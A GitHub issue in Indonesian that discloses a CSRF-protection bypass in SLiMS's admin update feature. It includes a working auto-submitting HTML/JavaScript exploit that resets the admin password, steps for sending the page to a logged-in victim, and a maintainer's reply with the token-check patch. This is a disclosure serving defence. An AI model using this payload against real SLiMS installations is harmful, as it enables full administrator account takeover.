Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[SECURITY BUG] Full Account Take Over Via Bypass CSRF Protection On Update Admin Features #103

Open
jrsfaisal opened this issue Jun 21, 2018 · 1 comment
Open

[SECURITY BUG] Full Account Take Over Via Bypass CSRF Protection On Update Admin Features #103

jrsfaisal opened this issue Jun 21, 2018 · 1 comment

Comments

@jrsfaisal
Copy link

jrsfaisal commented Jun 21, 2018
edited
Loading

Halo,

Saya menemukan security bug pada fitur update admin, pada fitur tersebut sudah mempunyai CSRF protections namun dapat di bypass.

Melalui bug ini dan kecerobohan pengguna (admin level) dapat dimanfaatkan oleh attacker untuk mengambil alih akun admin secara penuh.

Proof of concept

  1. Ketika melakukan update data admin sudah terdapat CSRF token.
    6_bypass csrf 1

  2. Namun sayangnya tidak ada pengecekan pada sisi server side untuk mengecek keberadaan parameter csrf_token. Parameter csrf_token dapat dihapus ketika proses POST data, sehingga dapat terbypass protectionnya. Berikut ini merupakan script exploit csrf yang dapat digunakan untuk mengeksploitasi celah ini

<html>
  <body onload="submitRequest()">
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/192.168.100.18:81\/slims\/admin\/modules\/system\/app_user.php?changecurrent=true&action=detail&ajaxload=1", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=--------863798609");
        xhr.withCredentials = true;
        var body = "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"form_name\"\r\n" + 
          "\r\n" + 
          "mainForm\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"userName\"\r\n" + 
          "\r\n" + 
          "admin\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"realName\"\r\n" + 
          "\r\n" + 
          "admin\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"userType\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"eMail\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[fb]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[tw]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[li]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[rd]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[pn]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[gp]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[yt]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[bl]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[ym]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"base64picstring\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"passwd1\"\r\n" + 
          "\r\n" + 
          "faisal\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"passwd2\"\r\n" + 
          "\r\n" + 
          "faisal\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"saveData\"\r\n" + 
          "\r\n" + 
          "Update\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"updateRecordID\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "----------863798609--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
  </body>
</html>

  1. Simpan script exploit diatas sebagai html file.

  2. Kirimkan exploit.html kepada korban yang sedang login pada slims miliknya.
    6_bypass csrf 2

  3. Berikut ini merupakan respon dari hasil perubahan data admin.
    6_bypass csrf 3

  4. Setelah berhasil, attacker dapat mengambil alih akun tersebut dengan login ke sistem slims korban menggunakan
    username : admin
    password : faisal
@drajathasan
Copy link
Contributor

drajathasan commented Aug 9, 2018
edited
Loading

Works disaya, pada app_user.php tidak diterapkan csrf token check yang menyebabkan bug ini dapat diexploit dengan mudah. karena pada dasarnya setiap form di SLiMS sudah dilengkapi CSRF token.

cukup menambahkan skrip ini

if (!simbio_form_maker::isTokenValid()) {
utility::jsAlert(__('Invalid form submission token!'));
utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'system', 'Invalid form submission token, might be a CSRF attack from '.$_SERVER['REMOTE_ADDR']);
exit();
}

pada statement saveData cukup untuk mempatch bug ini,

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@jrsfaisal @drajathasan